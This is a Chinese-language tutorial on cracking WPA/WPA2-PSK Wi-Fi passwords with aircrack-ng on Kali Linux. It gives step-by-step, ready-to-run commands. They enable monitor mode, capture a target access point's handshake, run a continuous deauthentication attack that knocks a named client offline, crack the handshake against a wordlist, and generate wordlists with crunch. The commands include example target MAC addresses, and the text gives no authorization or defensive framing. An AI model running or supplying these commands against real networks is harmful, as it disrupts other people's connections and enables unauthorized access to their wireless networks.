Kali之aircrack-ng
WPA-PSK的破解基於WPA-PSK握手驗證報文數據的獲取與識別,攻擊者只要獲取到盡可能的握手驗證報文數據包就有機會破解。
安裝 aircrack-ng 套件
註:Kali linux 是自帶組件的。
sudo apt-get install aircrak-ng
1) iwconfig #或airmon-ng,查看無線網卡
2)ifconfig wlan0 up #激活無線網卡。
3)airmon-ng start wlan0(無線網卡) #將無線網卡設置為監聽模式。
4)airodump-ng wlan0 #查看附近的wifi。airodump-ng <你的monitor名稱>
- BSSID是AP端的MAC地址
- PWR是信號強度,數字越小越好
- #Data是對應的路由器的在線數據吞吐量,數字越大,數據上傳量越大。
- CH是對應路由器的所在頻道
- ESSID是對應路由器的名稱
監聽wifi
5)airodump-ng -w 路徑/文件名 -c 頻道 --bssid mac地址 wlan0(處於監聽模式下的無線網卡) #對特定頻道下的無線網絡進行監聽,掃描數據保存到特定文件。
即sudo airodump-ng -c 6 -w /root/handshake --bssid C0:00:00:00:00:48 wlan0mon
握手包文件的拓展名為 .cap
如紅色方框所示。
然後,你的網卡會開始監聽你目標端的頻道,註意圖片的右上角
保持此terminal窗口的運行狀態
使用aireplay-ng進行解除認證攻擊模式
握手包的概念,握手包指的是采用WPA加密方式的無線AP與無線客戶端進行連接前的認證信息包。
一個合法的客戶端要連上AP要經歷四次握手(ex.2)
1.你請求連AP 2.AP發一個數據包給你
3.你將收到的數據包用wpa密鑰加密,然後發給AP
4.AP用自己保存的wpa密鑰加密相同數據包,然後和你發給他的比較,如果相同,就發準許接入的許可。
上面就是一個合法客戶端四次握手的全過程,我們所說的抓握手包,是指抓AP發給合法客戶的數據包,和合法客戶端加密後發給AP的數據包。所以我們就抓這兩個包,當我們有了明文和密文,就可以破解出密鑰。
所以我們這裏的關鍵是要發動攻擊,迫使合法的客戶端斷線,進行重新認證,我們趁機抓包。
6)aireplay-ng -0 0 -a AP的mac地址 -c 客戶端的mac地址 mon0(處於監聽模式下的無線網卡) #-0代表deauth重傳攻擊方式,使客戶端斷開重連以便有機會得到握手驗證數據報文
sudo aireplay-ng -0 0 -a 04:D1:3A:63:D9:02 -c 70:E2:01:61:87:84 wlan0mon
7)關閉監聽模式。
sudo airmon-ng stop wlan0mon
8)aircrack-ng -w 字典 捕獲的cap文件 #使用預先準備好的字典破解密碼,註意,WPA/WPA2加密的wifi密碼是一種相對安全的密碼保護機制,破解起來可能有一定的難度。
sudo aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap
註:`aircrack-ng -w <字典路徑> <握手包路徑>
制作字典
安裝crunch sudo apt-get install crunch
使用語法 crunch <min> max<max> <characterset> -t <pattern> -o <output filename>
<min>
= 最小密碼長度。 <max>
= 最大密碼長度。 <characterset>
= 用於生成密碼的字符集。 <pattern>
= 生成的密碼的指定模式。 <outputfile>
= 保存字典文件的路徑。
註: pattern中可以使用的特殊標記字符(ex.3) [%]
插入數字 [@]
插入小寫字母 [,]
插入大寫字母 [^]
插入符號
crunch 5 5 -t 1@,^9 -o /root/pwdlist.txt #生成第一位為1,第二位為小寫字母,第三位為答謝字母,第四位為符號,最後一位為9的五位數密碼
crunch 1 6 0123456789 -o /root/pwdlist.txt #生成1-6位純數字(指定的0-9)的密碼
Kali之aircrack-ng